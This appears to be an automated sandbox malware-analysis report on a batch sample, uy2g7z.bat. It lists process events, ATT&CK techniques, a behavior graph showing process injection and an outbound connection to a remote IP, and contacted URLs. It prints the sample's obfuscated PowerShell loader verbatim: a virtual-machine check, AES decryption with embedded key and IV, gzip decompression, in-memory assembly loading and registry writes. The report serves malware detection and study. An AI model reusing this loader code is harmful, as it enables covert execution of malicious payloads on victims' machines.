        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((get-wmiobject win32_diskdrive | select-object -expandproperty model | findstr /i 'wds100t2b0a') -and (-not (get-childitem -path f:\ -recurse | where-object { -not $_.psiscontainer } | measure-object).count)) {exit 900} else {exit 1}"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function cuof($vrvb){ invoke-expression -verbose -debug '$tack=35[s35ys35te35m35.s35e35cu35r35i35t35y35.35c35ry35pt35o35g35r35ap35hy35.35a35e35s35]:35:35c35r35e35a35te35(35);'.replace('35', ''); invoke-expression -informationaction ignore '$tack.3smo3sde3s=[3ss3sys3st3sem3s.3ss3se3sc3su3sr3sit3sy.3sc3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sc3si3sp3sh3se3srm3so3sde3s]3s:3s:3sc3sbc3s;'.replace('3s', ''); invoke-expression -verbose -debug -informationaction ignore '$tack.srpasrddsrinsrgsr=[srssryssrtsresrmsr.srssresrcusrrisrtsrysr.srcrsrypsrtsrosrgsrrsrapsrhsrysr.srpsrasrddsrisrngsrmsrosrdsresr]:sr:srpsrksrcsrssr7;'.replace('sr', ''); invoke-expression -warningaction inquire -informationaction ignore '$tack.6ike6iy=6i[s6iy6ist6ie6im.6ic6io6in6iv6ie6ir6it]6i::6if6ir6io6imb6ias6ie6i66i46is6itr6ii6in6ig6i("6iex6iai6iqp6ih6ixc6ii6isa6iu6ir6ib6ic6il6i+6icb6i4j6i66iw6il6i4f6irm6ib6i76i/6i66ihb6ig6ir6ij6ih6i26ick6ii6i=");'.replace('6i', ''); invoke-expression -warningaction inquire -debug -informationaction ignore -verbose '$tack.pjivpj=[pjsypjspjtepjmpj.cpjopjnpjvpjepjrpjtpj]:pj:fpjrpjopjmpjbapjsepj6pj4pjspjtpjripjnpjgpj("pjlypjw7pjocpjepjgopj3pj6xpjzpjlpjqpjrpjepjepj5xpjlqpj=pj=");'.replace('pj', ''); $hznf=$tack.createdecryptor(); $gttc=$hznf.transformfinalblock($vrvb, 0, $vrvb.length); $hznf.dispose(); $tack.dispose(); $gttc;}function ppfm($vrvb){ invoke-expression -informationaction ignore -warningaction inquire -debug '$bybd=uwneuww-uwobuwjuwecuwtuw suwyuwsuwtuweuwmuw.uwiouw.muweuwmuwouwryuwstuwruweuwauwmuw(,$vrvb);'.replace('uw', ''); invoke-expression -informationaction ignore -warningaction inquire -debug -verbose '$aohn=uwneuww-uwobuwjuwecuwtuw suwyuwsuwtuweuwmuw.uwiouw.muweuwmuwouwryuwstuwruweuwauwmuw;'.replace('uw', ''); invoke-expression -warningaction inquire -debug -informationaction ignore '$rqyh=qunequw-quobqujquecqutqu squyqusqutquequmqu.quioqu.cquoqumqupqurequssquiquoqunqu.qugzquiqupqusqutqurqueaqum($bybd, qu[iquo.qucoqumquprquequssquiquoqunqu.qucquoqumpqurequsqusquiquonqumoqudquequ]qu:qu:dquequcquoqumqupqurequsqus);'.replace('qu', ''); $rqyh.copyto($aohn); $rqyh.dispose(); $bybd.dispose(); $aohn.dispose(); $aohn.toarray();}function qigo($vrvb,$bchx){ invoke-expression -verbose -warningaction inquire '$lhpd=or[sorysorteormor.roreorfloreorcortorioroornor.aorssoreormorborlyor]:or:orlorooraord([byte[]]$vrvb);'.replace('or', ''); invoke-expression -debug -warningaction inquire '$aejb=$lhpd.obenobtrobypoboobinobt;'.replace('ob', ''); invoke-expression -debug '$aejbr9.ir9nvr9okr9er9($r9nr9ulr9lr9, $bchx);'.replace('r9', '');}function zab($lyat){ $registrypath = 'hklm:\software\oohhhm='; if (test-path $registrypath) { remove-itemproperty -path $registrypath -name * -force } else { new-item -path $registrypath -force; } set-itemproperty -path $registrypath -name 'map' -value 'vckcvwmmykqfoeskisq;mnfadyqrq;ovwrknedq'; set-itemproperty -path $registrypath -name 'vckcvwmJump to behavior
        Source: conhost.exe, 00000004.00000002.2734479178.00000281B6680000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2785504516.0000020D06380000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.1569314586.0000022FCF230000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: conhost.exe, 00000004.00000002.2734479178.00000281B6680000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2785504516.0000020D06380000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.1569314586.0000022FCF230000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: conhost.exe, 00000004.00000002.2734479178.00000281B6680000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2785504516.0000020D06380000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.1569314586.0000022FCF230000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: conhost.exe, 00000004.00000002.2734479178.00000281B6680000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2785504516.0000020D06380000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.1569314586.0000022FCF230000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Windows\System32\cmd.exeCode function: 3_3_000001D54F9E45D0 cpuid 3_3_000001D54F9E45D0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Device\v4.0_4.0.0.0__b77a5c561934e089\System.Device.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-CDdDgiS8 VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-CDdDgiS8 VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA09070 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_000001D54FA09070
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid Accounts341
        Windows Management Instrumentation        		1
        Scripting        		1
        DLL Side-Loading        		1
        Deobfuscate/Decode Files or Information        		1
        Credential API Hooking        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		612
        Process Injection        		2
        Obfuscated Files or Information        		121
        Input Capture        		2
        File and Directory Discovery        		Remote Desktop Protocol1
        Credential API Hooking        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Scheduled Task/Job        		1
        Scheduled Task/Job        		1
        Scheduled Task/Job        		1
        DLL Side-Loading        		Security Account Manager143
        System Information Discovery        		SMB/Windows Admin Shares121
        Input Capture        		1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        PowerShell        		Login HookLogin Hook4
        Rootkit        		NTDS351
        Security Software Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Masquerading        		LSA Secrets141
        Virtualization/Sandbox Evasion        		SSHKeylogging13
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Modify Registry        		Cached Domain Credentials3
        Process Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
        Virtualization/Sandbox Evasion        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job612
        Process Injection        		Proc Filesystem1
        System Network Configuration Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
        Hidden Files and Directories        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637038 Sample: uy2g7z.bat Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 47 ipwho.is 2->47 71 Suricata IDS alerts for network traffic 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Yara detected Powershell decrypt and execute 2->75 77 6 other signatures 2->77 11 cmd.exe 1 2->11         started        signatures3 process4 signatures5 97 Suspicious powershell command line found 11->97 14 powershell.exe 12 11->14         started        17 conhost.exe 11->17         started        process6 signatures7 99 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 14->99 19 cmd.exe 1 14->19         started        process8 signatures9 79 Suspicious powershell command line found 19->79 22 powershell.exe 31 29 19->22         started        26 powershell.exe 15 19->26         started        28 more.com 1 19->28         started        30 2 other processes 19->30 process10 dnsIp11 49 45.94.31.176, 4782, 49713 GBTCLOUDUS Netherlands 22->49 51 ipwho.is 195.201.57.90, 443, 49714 HETZNER-ASDE Germany 22->51 89 Writes to foreign memory regions 22->89 91 Modifies the context of a thread in another process (thread injection) 22->91 93 Hides that the sample has been downloaded from the Internet (zone.identifier) 22->93 95 3 other signatures 22->95 32 winlogon.exe 22->32 injected 35 findstr.exe 1 26->35         started        signatures12 process13 signatures14 63 Injects code into the Windows Explorer (explorer.exe) 32->63 65 Writes to foreign memory regions 32->65 67 Allocates memory in foreign processes 32->67 69 2 other signatures 32->69 37 svchost.exe 32->37 injected 40 lsass.exe 32->40 injected 42 svchost.exe 32->42 injected 45 31 other processes 32->45 process15 dnsIp16 81 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 37->81 83 Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes) 37->83 85 Queries temperature or sensor information (via WMI often done to detect virtual machines) 37->85 87 Writes to foreign memory regions 40->87 53 192.168.2.10 unknown unknown 42->53 55 192.168.2.16 unknown unknown 42->55 57 192.168.2.9 unknown unknown 42->57 59 142.250.181.227, 49705, 80 GOOGLEUS United States 45->59 61 2.16.164.49, 49688, 49689, 49690 AKAMAI-ASN1EU European Union 45->61 signatures17

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        uy2g7z.bat2%VirustotalBrowse
        uy2g7z.bat0%ReversingLabs

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://microsoft.corosoft%20Time-Stamp%20PCA%202010(1).crl00%Avira URL Cloudsafe
        https://wns2-am3p.notify.windows.com/?token=AwYAAAAVHcznLkp9fcrV9Clhd2HepVc2%2fAlS973crXBsYmvJM5lgXx0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        ipwho.is
        		195.201.57.90
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://ipwho.is/false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1416391663.00000271202BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712EAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://g.live.com/odclientsettings/ProdV2f%svchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  https://g.live.com/odclientsettings/Prodsvchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000005.00000002.1416391663.000002711FDA4000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://microsoft.corosoft%20Time-Stamp%20PCA%202010(1).crl0powershell.exe, 00000005.00000002.1436384830.0000027136ECB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://aka.ms/pscore6xGX%powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/pscore6powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.office.com/pwaimagessvchost.exe, 00000029.00000002.2817889287.000002565B284000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1731065473.000002565B284000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.microsvchost.exe, 00000017.00000002.2721583993.0000021C28BE0000.00000002.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            https://outlook.comsvchost.exe, 00000029.00000000.1728791897.000002565AE1C000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 00000018.00000000.1651233793.00000276D6FD0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2766065494.00000276D6FD0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://g.live.com/odclientsettings/ProdV2C:svchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://g.live.com/odclientsettings/ProdC:svchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://excel.office.comSRD1%svchost.exe, 00000029.00000002.2816272726.000002565B218000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2001193978.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1728303755.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2793878629.000002565AD9B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
